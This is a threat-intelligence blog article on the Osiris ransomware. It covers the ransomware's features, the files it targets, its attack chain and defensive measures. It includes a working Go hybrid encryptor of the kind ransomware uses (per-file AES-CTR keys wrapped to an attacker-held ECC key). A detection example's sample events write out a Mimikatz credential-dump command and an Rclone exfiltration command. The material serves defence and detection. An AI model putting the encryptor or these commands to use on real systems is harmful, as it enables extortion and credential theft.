

Introducing Osiris: A Sophisticated New Ransomware Threat

Read Time 10 mins | 20 Mar 2026 | Written by: Nur Rachmi Latifa

Osiris Ransomware

Cybersecurity experts continue to warn organizations about the evolving nature of cybercrime. One of the most alarming developments in recent months is the emergence of Osiris, a newly identified ransomware threat that demonstrates sophisticated techniques and operational maturity. First observed in late 2025, this ransomware has already targeted major organizations and shows signs of being operated by highly experienced attackers. The appearance of Osiris ransomware is another reminder that the global ransomware ecosystem continues to evolve rapidly. Attackers constantly refine their methods, combining new malware families with proven tactics such as data exfiltration, remote access tools, and privilege escalation techniques.

What Is Osiris Ransomware?

Osiris is a newly discovered ransomware threat that was identified during an attack targeting a major food service franchise operator in Southeast Asia in November 2025. Security researchers investigating the incident concluded that this malware represents a completely new ransomware family.

Although the name “Osiris” may sound familiar to cybersecurity professionals, it is important to note that this ransomware is not related to the Osiris variant discovered in 2016, which was linked to the Locky ransomware family. The modern Osiris threat appears to have been developed independently and shows distinct functionality and design. At the time of analysis, little is known about the developers behind this ransomware threat.

Researchers have not confirmed whether Osiris operates as a ransomware-as-a-service (RaaS) platform or whether it is controlled by a single threat group. However, evidence suggests that the attackers deploying Osiris may have connections to previous Inc ransomware campaigns. These similarities include shared tools, tactics, and operational behaviors that hint at either collaboration or the involvement of former affiliates of existing ransomware groups.


Key Characteristics of the Osiris Ransomware Threat

Like many modern ransomware families, Osiris includes a wide range of malicious functions designed to maximize the damage inflicted on victims. The ransomware is capable of:

  • Stopping critical services
  • Terminating important processes
  • Encrypting files across targeted systems
  • Selecting specific folders and file extensions to encrypt
  • Dropping a ransom note for victims

These features allow attackers to disrupt business operations while ensuring that valuable files are inaccessible unless the ransom is paid. One of the distinctive aspects of the Osiris ransomware threat is its flexibility through command-line parameters. Attackers can configure the ransomware to perform specific actions during deployment, such as specifying directories to encrypt or enabling partial or full encryption modes. For example, the ransomware supports options that allow operators to:

  • Define log file paths
  • Target specific files or directories for encryption
  • Disable Hyper-V virtual machines
  • Skip encryption of selected virtual machines
  • Choose between partial or full file encryption

This level of control suggests that Osiris was developed by experienced malware authors who understand the needs of ransomware operators conducting targeted attacks.

Files and Systems Targeted by Osiris

A common strategy among ransomware developers is to leave alone the files the operating system needs in order to boot and run. A machine that no longer starts cannot display the ransom note or reach the negotiation portal, and a victim who never sees the demand cannot pay it. Osiris follows this strategy, and it also skips large media files, which are slow to encrypt. The extensions it deliberately skips include:

  • .exe
  • .dll
  • .msi
  • .mp4
  • .mp3
  • .mov
  • .avi
  • .apk
  • .sys

Similarly, it avoids encrypting critical system directories such as:

  • Windows
  • System Volume Information
  • ProgramData
  • Documents and Settings
  • $Recycle.bin

By leaving those locations untouched, the ransomware keeps the system usable enough for the victim to read the note and contact the operators. After encryption, the malware appends the extension .Osiris to each affected file, so document.txt becomes document.txt.Osiris. A sudden wave of renames to that extension is a clear sign of an Osiris attack in progress, but the extension alone does not identify the family: the unrelated 2016 Locky variant mentioned above used the same suffix, so the ransom note and the binary itself should be used to confirm.

Advanced Encryption Mechanism

One of the most critical components of any ransomware threat is its encryption mechanism. Osiris uses a hybrid encryption scheme that combines modern cryptographic techniques. The ransomware utilizes:

  • ECC (Elliptic Curve Cryptography)
  • AES-128-CTR encryption

Each file encrypted by Osiris receives its own randomly generated AES key. That key is then wrapped (encrypted) with the operators' ECC public key, which is all the encryptor needs to carry; the matching private key never touches the victim's network, so the wrapped keys cannot be unwrapped without it. This hybrid design is standard in mature ransomware families because it balances speed and security: AES in CTR mode processes file data quickly, while ECC protects the per-file keys. It also has a consequence for responders: a memory dump of the encryptor recovers at most the keys of the files it was working on at that moment, never a master key for the whole set.
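The hybrid scheme described above, as an added example that is not Osiris's code and is not taken from any analysis of it: one file is encrypted with a fresh AES-128-CTR key, and that key is wrapped for an operator-held P-256 key through an ephemeral ECDH exchange. The footer layout, the choice of P-256 and the SHA-256 key derivation are assumptions made for this example; the page says only that ECC and AES-128-CTR are used.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Per-file footer layout assumed for this example (the page does not describe
// Osiris's real on-disk format):
//   ciphertext || ephemeral P-256 public key (65 bytes) || wrapped AES key (16) || CTR nonce (16)
const (
	ephPubLen = 65
	keyLen    = 16 // AES-128
	nonceLen  = 16
	footerLen = ephPubLen + keyLen + nonceLen
)

// kekFromShared derives a 16-byte key-encryption key from an ECDH shared secret.
// Simplified for the example; production code would use HKDF with a context label.
func kekFromShared(shared []byte) []byte {
	sum := sha256.Sum256(shared)
	return sum[:keyLen]
}

// xorKey wraps or unwraps a file key with a KEK that is used exactly once,
// because every file gets its own ephemeral ECDH exchange.
func xorKey(k, kek []byte) []byte {
	out := make([]byte, len(k))
	for i := range k {
		out[i] = k[i] ^ kek[i]
	}
	return out
}

// EncryptFile: fresh random AES-128 key per file, CTR mode, key wrapped to the
// operator's public key. The encryptor never needs the operator's private key.
func EncryptFile(operatorPub *ecdh.PublicKey, plaintext []byte) ([]byte, error) {
	fileKey := make([]byte, keyLen)
	nonce := make([]byte, nonceLen)
	if _, err := rand.Read(fileKey); err != nil {
		return nil, err
	}
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	eph, err := ecdh.P256().GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	shared, err := eph.ECDH(operatorPub)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(fileKey)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(plaintext), len(plaintext)+footerLen)
	cipher.NewCTR(block, nonce).XORKeyStream(out, plaintext)
	out = append(out, eph.PublicKey().Bytes()...)
	out = append(out, xorKey(fileKey, kekFromShared(shared))...)
	out = append(out, nonce...)
	return out, nil
}

// DecryptFile needs the operator's private key to rebuild the per-file KEK.
// CTR mode has no integrity check: a wrong key yields garbage, not an error.
func DecryptFile(operatorPriv *ecdh.PrivateKey, blob []byte) ([]byte, error) {
	if len(blob) < footerLen {
		return nil, errors.New("blob shorter than footer")
	}
	ct, footer := blob[:len(blob)-footerLen], blob[len(blob)-footerLen:]
	ephPub, err := ecdh.P256().NewPublicKey(footer[:ephPubLen])
	if err != nil {
		return nil, err
	}
	wrapped := footer[ephPubLen : ephPubLen+keyLen]
	nonce := footer[ephPubLen+keyLen:]
	shared, err := operatorPriv.ECDH(ephPub)
	if err != nil {
		return nil, err
	}
	fileKey := xorKey(wrapped, kekFromShared(shared))
	block, err := aes.NewCipher(fileKey)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCTR(block, nonce).XORKeyStream(pt, ct)
	return pt, nil
}

func main() {
	operator, _ := ecdh.P256().GenerateKey(rand.Reader) // stays with the attacker
	blob, _ := EncryptFile(operator.PublicKey(), []byte("quarterly figures"))
	pt, _ := DecryptFile(operator, blob)
	fmt.Printf("footer %d bytes, roundtrip ok: %v\n", footerLen, bytes.Equal(pt, []byte("quarterly figures")))
}
```

Two encryptions of the same file produce different output, which is the per-file key at work. DecryptFile only works with the operator's private key; with any other key it returns garbage rather than an error, because CTR mode carries no integrity check, and that is also why a victim cannot tell a genuine decryptor from a broken one without testing it on a sample file.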

The ransomware also drives its file I/O through Windows I/O completion ports (the CreateIoCompletionPort and GetQueuedCompletionStatus APIs), which let a pool of worker threads keep many reads and writes in flight at once. The effect is throughput: the window between deployment and full encryption shrinks, which is what matters to the operator. The resulting burst of disk activity across many files is one of the more reliable behavioural signs once encryption has started.

Process and Service Termination

To maximize the effectiveness of its attack, the Osiris ransomware threat actively terminates processes that might interfere with encryption. Examples of targeted processes include:

  • SQL database services
  • Microsoft Office applications
  • Outlook and email clients
  • Backup and synchronization tools
  • Cloud storage processes

By terminating these processes, the ransomware releases the file locks they hold, so open databases, mailboxes and documents can be encrypted rather than skipped. In addition to processes, Osiris also stops critical services such as:

  • VSS (Volume Shadow Copy Service)
  • Microsoft Exchange services
  • Backup software services
  • Various database services

Stopping these services removes the victim's quickest recovery paths. Note that stopping VSS blocks new snapshots but does not by itself delete the shadow copies that already exist; those survive unless the operator removes them separately, so checking for surviving shadow copies on affected hosts is worth doing early in the response.

The Ransom Note

Once encryption is complete, the ransomware drops a file named “Osiris-MESSAGE.txt.” This ransom note informs victims that their files have been encrypted and that sensitive data has been stolen. It typically includes a link to a negotiation platform where victims can communicate directly with the attackers to discuss payment.

The attackers also threaten to leak the stolen data if the ransom is not paid, a tactic commonly known as double extortion. This strategy has become a common practice in modern ransomware operations because it significantly increases pressure on victims to comply with the attackers’ ransom demands.

The Attack Chain Behind Osiris

Understanding how the Osiris operators reached the point of encryption is essential for organizations that want to detect a similar intrusion before it gets that far. Based on the investigation of the 2025 incident, the attack involved multiple stages: data exfiltration, credential theft, reconnaissance and remote access tooling, with the malicious driver and the encryptor deployed last. The earliest activity the investigators could identify was the exfiltration itself.

Data Exfiltration Using Rclone

One of the earliest indicators of the attack was the use of Rclone, a legitimate command-line tool for synchronising files with cloud storage. The attackers used it to push sensitive data from the victim's network to a Wasabi cloud storage bucket. Rclone moves large volumes quickly, and its traffic is ordinary HTTPS to a commercial storage provider, so it blends in unless someone is looking for it. In practice the things to look for are an rclone binary or command line on a server that has no business running it, and outbound connections to Wasabi's S3 endpoints under wasabisys.com from hosts that do not normally talk to them. The same exfiltration method had previously been observed in operations linked to the Inc ransomware group, one of several overlaps between the campaigns.

Credential Theft Using Mimikatz

Another important tool used during the attack was Mimikatz, a well-known credential harvesting utility widely used by threat actors. In this case, attackers deployed a variant of Mimikatz named kaz.exe, which had also been seen in earlier Inc ransomware incidents. The reuse of the same filename and tool variant strengthens the theory that the operators behind the Osiris ransomware threat may have prior experience with other ransomware operations.

Use of Dual-Use Administrative Tools

The attackers also relied on several tools that are not malware in themselves: Netscan (a network scanner), Netexec (a network execution and credential-testing framework that continues CrackMapExec) and MeshAgent (the endpoint agent of the MeshCentral remote management platform). Administrators and penetration testers use these legitimately, which is exactly why attackers favour them: antivirus rarely flags them, and their activity looks like administration. In this campaign they were most likely used for reconnaissance, lateral movement and persistence. Strictly speaking this is dual-use tooling rather than “living off the land”, a term reserved for abusing the utilities that ship with the operating system, but the defensive problem is the same: the tool is not the indicator, the context is. Application control that only permits remote administration tools from approved paths and accounts catches this where signature-based detection cannot.

Modified Remote Access Tools

Another notable element was a modified build of RustDesk, an open-source remote desktop application. The attackers rebranded it as “WinZip Remote Desktop” and gave it the WinZip application icon so that it would pass for a legitimate product to users and to anyone skimming a process list. The disguise changes only the strings and the icon; the code and its network behaviour are still RustDesk, so a detection keyed on the binary's internals or on the traffic it generates survives the rebrand, while one keyed on the product name does not. Since WinZip ships no remote-desktop product, the name itself is a usable indicator.

These combined techniques demonstrate that the operators behind the Osiris ransomware threat relied on a carefully coordinated attack chain, leveraging both legitimate tools and modified software to infiltrate networks and prepare systems for ransomware deployment.

The Role of the Poortry Driver

One of the most sophisticated elements of the Osiris intrusion is the use of a malicious kernel driver called Poortry, also known as Abyssworker. Its role was to weaken endpoint defenses before encryption. It was deployed in the manner of a Bring Your Own Vulnerable Driver (BYOVD) attack, a technique ransomware operators increasingly use to get past modern endpoint protection.

In a classic BYOVD attack the criminals bring a legitimately signed third-party driver with a known flaw, load it, and exploit the flaw to run code in the kernel. Poortry is a variation on that theme: rather than a vulnerable legitimate driver, it is a purpose-built malicious driver carrying a valid code signature, obtained by abusing stolen or improperly issued certificates (earlier Poortry samples were even signed through Microsoft's hardware compatibility program, as reported in 2022). Because the signature chain validates, Windows loads it like any other driver, and from kernel mode it can terminate EDR and antivirus processes or strip their protections before the encryptor runs. Two controls matter here: keeping Microsoft's vulnerable and malicious driver blocklist enforced (it is applied on recent Windows versions and wherever hypervisor-protected code integrity is on), and treating any driver load from a user-writable path as an incident. Neither depends on recognising this particular driver.

Additional Tools Used in the Attack

In addition to the Poortry driver, the attackers deployed further tooling to keep control of the network and blunt its defenses:

  • KillAV, a generic name for a utility whose only job is to terminate antivirus and EDR processes
  • Remote Desktop Protocol (RDP), which is not a tool but Windows' built-in remote access channel, used here for interactive access to compromised hosts

Their presence shows an operation planned in layers: if one access or evasion method was cut off, another was already in place.
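The indicators from the attack-chain sections above (Rclone aimed at Wasabi, kaz.exe, the WinZip-branded RustDesk, a driver loaded from a user-writable path, VSS stopped, the .Osiris extension and the Osiris-MESSAGE.txt note) turned into a small host triage routine. This is an added example, not part of the original article and not any vendor's detection content. The event schema, hostnames, paths and the assumption that the Wasabi remote is visible on the Rclone command line are all constructed for the example.

```go
package main

import (
	"path/filepath"
	"strings"
)

// Event is a minimal stand-in for one EDR or Sysmon record; the field set is an
// assumption for this example, not any vendor's schema.
type Event struct {
	Host    string
	Kind    string // "process" (creation), "driver" (load), "file" (create/rename), "service" (state change)
	Image   string // process image or driver path
	Cmdline string // full command line (process events)
	Descr   string // file-version "description" field, as EDRs usually record it
	Target  string // file path (file events) or service name (service events)
	Action  string // "stop" and similar, for service events
}

// Finding pairs the matched indicator with the evidence that triggered it.
type Finding struct{ Host, Rule, Evidence string }

func baseLower(p string) string {
	return strings.ToLower(filepath.Base(strings.ReplaceAll(p, `\`, "/")))
}

// Detect applies the attack-chain indicators described on the page to one event.
func Detect(ev Event) []Finding {
	var out []Finding
	add := func(rule, evidence string) { out = append(out, Finding{ev.Host, rule, evidence}) }
	img, cmd := baseLower(ev.Image), strings.ToLower(ev.Cmdline)
	switch ev.Kind {
	case "process":
		// Rclone aimed at Wasabi (assumed: remote name or endpoint on the command line contains "wasabi").
		if img == "rclone.exe" && strings.Contains(cmd, "wasabi") {
			add("exfil-rclone-wasabi", ev.Cmdline)
		}
		// kaz.exe is the renamed Mimikatz seen here and in earlier Inc intrusions; the
		// module syntax also catches a copy renamed to something else.
		if img == "kaz.exe" || strings.Contains(cmd, "sekurlsa::") {
			add("credtheft-mimikatz", ev.Image+" "+ev.Cmdline)
		}
		// WinZip ships no remote-desktop product, so this description is the rebranded RustDesk.
		if strings.Contains(strings.ToLower(ev.Descr), "winzip remote desktop") {
			add("rat-rustdesk-masquerade", ev.Image+" ("+ev.Descr+")")
		}
		// Shadow-copy deletion or VSS shutdown through built-in tools.
		if (img == "vssadmin.exe" && strings.Contains(cmd, "delete shadows")) ||
			((img == "net.exe" || img == "sc.exe") && strings.Contains(cmd, "stop") && strings.Contains(cmd, "vss")) {
			add("impact-vss-tamper", ev.Cmdline)
		}
	case "driver":
		// A kernel driver loading from a user-writable path is the usual BYOVD tell; Microsoft's
		// driver blocklist (hash and certificate based) is the authoritative check and is not modelled here.
		p := strings.ToLower(strings.ReplaceAll(ev.Image, `\`, "/"))
		for _, dir := range []string{"/temp/", "/users/", "/programdata/"} {
			if strings.Contains(p, dir) {
				add("defense-evasion-driver-from-user-path", ev.Image)
				break
			}
		}
	case "file":
		if t := baseLower(ev.Target); t == "osiris-message.txt" {
			add("ransom-note-osiris", ev.Target)
		} else if strings.HasSuffix(t, ".osiris") {
			add("encrypted-file-osiris", ev.Target)
		}
	case "service":
		if strings.EqualFold(ev.Target, "vss") && strings.EqualFold(ev.Action, "stop") {
			add("impact-vss-tamper", "VSS stopped, reported by "+ev.Image)
		}
	}
	return out
}

// Triage groups findings per host so the chain shows up together rather than as isolated alerts.
func Triage(events []Event) map[string][]Finding {
	byHost := map[string][]Finding{}
	for _, ev := range events {
		for _, f := range Detect(ev) {
			byHost[f.Host] = append(byHost[f.Host], f)
		}
	}
	return byHost
}

// SampleEvents is constructed telemetry for this example; hosts, paths and remote names are invented.
func SampleEvents() []Event {
	return []Event{
		{Host: "FS01", Kind: "process", Image: `C:\Users\Public\rclone.exe`, Cmdline: `rclone.exe copy D:\Shares\Finance wasabi:bkt-7f3a --transfers 32`},
		{Host: "FS01", Kind: "process", Image: `C:\Users\Public\kaz.exe`, Cmdline: `kaz.exe "privilege::debug" "sekurlsa::logonpasswords" exit`},
		{Host: "FS01", Kind: "process", Image: `C:\ProgramData\WinZip\wzrd.exe`, Descr: "WinZip Remote Desktop"},
		{Host: "FS01", Kind: "driver", Image: `C:\Users\Public\prt.sys`},
		{Host: "FS01", Kind: "service", Image: `C:\Windows\System32\services.exe`, Target: "VSS", Action: "stop"},
		{Host: "FS01", Kind: "file", Target: `D:\Shares\Finance\Q3.xlsx.Osiris`},
		{Host: "FS01", Kind: "file", Target: `D:\Shares\Finance\Osiris-MESSAGE.txt`},
		{Host: "WS07", Kind: "process", Image: `C:\Windows\System32\svchost.exe`, Cmdline: "svchost.exe -k netsvcs"},
	}
}
```

Running Triage(SampleEvents()) yields seven findings on FS01 and none on WS07. The point of grouping by host is that the individual rules are weak on their own (Rclone and net.exe have legitimate uses), but a host that shows exfiltration, credential dumping, a rebranded RAT and a driver from a user-writable path within the same window is not a false positive, and the first three of those appear before any file is renamed.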

Possible Links to Other Ransomware Groups

Although researchers have not definitively linked Osiris ransomware to a specific threat group, several indicators suggest that the attackers may have connections to previously active ransomware operators. The overlap in tactics and tools raises the possibility that experienced affiliates from other ransomware campaigns are involved. Indicators suggesting potential links include:

  • Data exfiltration to Wasabi cloud storage
  • Use of the kaz.exe version of Mimikatz
  • Overlaps with tactics used by Inc ransomware attackers

Additionally, the Poortry driver has previously been observed in attacks associated with the Medusa ransomware group. However, since Poortry is not exclusive to a single threat actor, its presence alone does not confirm attribution. Instead, it highlights how ransomware operators frequently share tools and techniques across the cybercriminal ecosystem.

Why the Osiris Ransomware Threat Matters

The emergence of Osiris highlights several important trends in the evolving ransomware landscape. As cybercriminal groups continue to refine their methods, ransomware attacks are becoming increasingly complex and difficult to detect.

Modern ransomware campaigns often combine data theft, privilege escalation, and advanced encryption techniques to maximize their impact. In addition, the ransomware ecosystem is highly dynamic, with new malware families appearing frequently and often being developed by attackers who previously worked with other ransomware groups.

These attacks are rarely simple malware infections. Instead, they are usually multi-stage operations involving reconnaissance, lateral movement, and data exfiltration before encryption occurs. As a result, organizations that fail to detect early warning signs may only discover the intrusion when ransomware is finally deployed.

How Organizations Can Protect Themselves

Given the sophistication of intrusions like this one, organizations need a layered defense that covers the whole chain, not just the final encryption. Measures that address the techniques described above:

  1. Endpoint detection and response with tamper protection enabled, so that an AV-killer or a malicious driver cannot simply switch the sensor off
  2. Microsoft's vulnerable driver blocklist and hypervisor-protected code integrity (HVCI) enforced, with alerting on any kernel driver loaded from a user-writable path
  3. Egress monitoring for bulk transfers to cloud storage, including rclone on servers and connections to storage providers the organization does not use
  4. Application control that restricts remote administration and pentest tooling (RustDesk, MeshAgent, Netexec, Netscan and the like) to approved paths and accounts
  5. Credential hygiene that limits what Mimikatz can harvest: no domain administrator logons to workstations, and LSA protection (RunAsPPL) and Credential Guard where supported
  6. RDP reachable only from trusted networks or through a gateway with multi-factor authentication, never directly from the internet
  7. Patching of operating systems, drivers and edge devices, since initial access frequently comes through an unpatched perimeter service

Beyond these, organizations should keep offline or immutable backups that an account with domain privileges cannot delete, and should test restores, since stopping VSS and backup services is part of the playbook. Regular awareness training remains relevant because many intrusions still begin with a phishing email or a compromised credential.


Conclusion

The discovery of Osiris highlights the evolving nature of modern ransomware threats. With advanced encryption, defense evasion techniques, and a complex attack chain, Osiris demonstrates the capabilities of experienced cybercriminals. As ransomware continues to grow more sophisticated, organizations must strengthen their cybersecurity defenses and stay vigilant to detect threats early and reduce the risk of serious data loss.


Nur Rachmi Latifa

A writer who focuses on producing content related to Cybersecurity, Privacy, and Human Cyber Risk Management.
